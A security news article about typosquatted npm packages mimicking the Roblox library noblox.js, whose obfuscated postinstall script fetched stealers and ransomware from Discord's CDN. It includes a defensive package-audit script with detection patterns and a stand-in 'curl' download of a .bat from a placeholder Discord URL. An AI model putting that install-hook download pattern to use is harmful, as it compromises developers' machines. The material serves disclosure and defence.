Malicious NPM Libraries Caught Installing Password Thief and Ransomware


Malicious actors have once again published two more typosquatted libraries to the official NPM repository that mimic a legitimate package from Roblox, the game company, with the goal of stealing credentials, installing remote access trojans, and infecting compromised systems with ransomware.

The bogus packages – named “noblox.js-proxy” and “noblox.js-proxies” – were found to mimic a library called “noblox.js”, a Roblox game API wrapper available on NPM that boasts close to 20,000 weekly downloads, with the two poisoned libraries downloaded a total of 281 and 106 times, respectively.


According to Sonatype researcher Juan Aguirre, who discovered the malicious NPM packages, the author of noblox.js-proxy first published a benign version that was later tampered with by adding obfuscated text – in effect, a Batch (.bat) script – to the post-installation JavaScript file.

This batch script, in turn, downloads malicious executables from Discord’s content delivery network (CDN) that are responsible for disabling anti-malware engines, persisting on the host, siphoning off browser credentials, and even deploying binaries with ransomware capabilities.
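The two traits described above – an install-time lifecycle hook whose script body is obfuscated and pulls a batch file from Discord’s CDN, and a package name that is a near-duplicate of a popular one – are exactly what a pre-install audit can flag. The following is an added example written for this article, not code from Sonatype or from any of the packages discussed; the manifest and script body are constructed stand-ins, and the URL is a placeholder.

```javascript
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];

// Levenshtein edit distance, used to find near-duplicate package names.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
    }
  }
  return d[a.length][b.length];
}

// Legitimate names that `name` could be impersonating: within a small edit distance,
// or the legitimate name with a suffix bolted on (noblox.js -> noblox.js-proxy).
function typosquatCandidates(name, legitimateNames, maxDistance = 2) {
  return legitimateNames.filter((legit) => legit !== name &&
    (editDistance(name, legit) <= maxDistance || name.startsWith(legit + '-')));
}

// Audit a parsed package.json plus the bodies of the files its install hooks run.
function auditPackage(manifest, scriptBodies = {}, legitimateNames = []) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!scripts[hook]) continue;
    const body = `${scripts[hook]}\n${scriptBodies[hook] || ''}`;
    findings.push(`runs code at install time via "${hook}"`);
    if (/\.(bat|cmd)\b/i.test(body)) findings.push(`${hook}: references a Windows batch file`);
    if (/cdn\.discordapp\.com/i.test(body)) findings.push(`${hook}: fetches from Discord CDN`);
    if (/(\\x[0-9a-f]{2}){8,}/i.test(body)) findings.push(`${hook}: long hex-escaped string (obfuscation)`);
  }
  const lookalikes = typosquatCandidates(manifest.name, legitimateNames);
  if (lookalikes.length) findings.push(`name resembles ${lookalikes.join(', ')}`);
  return { name: manifest.name, risky: findings.length > 0, findings };
}

// Constructed sample: the manifest shape of the package described above and a
// stand-in script body (the real obfuscated script is not reproduced here).
const sampleManifest = { name: 'noblox.js-proxy', scripts: { postinstall: 'node postinstall.js' } };
const sampleBodies = { postinstall: '\\x63\\x75\\x72\\x6c\\x20\\x2d\\x4f\\x20' +
  'https://cdn.discordapp.com/attachments/PLACEHOLDER/stage1.bat' };
const report = auditPackage(sampleManifest, sampleBodies, ['noblox.js', 'lodash']);
console.log(JSON.stringify(report, null, 2));
```

In practice the manifest and hook script bodies would be read from each package under node_modules before `npm install` is allowed to run lifecycle scripts (for example, after an `--ignore-scripts` install).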

Recent research from Check Point Research and Microsoft-owned RiskIQ has revealed how threat actors are increasingly abusing Discord’s CDN, a platform with 150 million users, to persistently deliver 27 unique malware families, ranging from backdoors and password stealers to spyware and trojans.

Although the two malicious NPM libraries have since been removed and are no longer available, the findings are another indication of how popular code registries such as NPM, PyPI, and RubyGems have become a lucrative frontier for carrying out a variety of attacks.

The disclosure also follows a recent supply chain attack targeting “UAParser.js”, a popular NPM JavaScript library with over 6 million weekly downloads, in which the developer’s account was hijacked to corrupt the package with cryptocurrency mining and credential-stealing malware, days after three more cryptocurrency mining packages were purged from the registry.
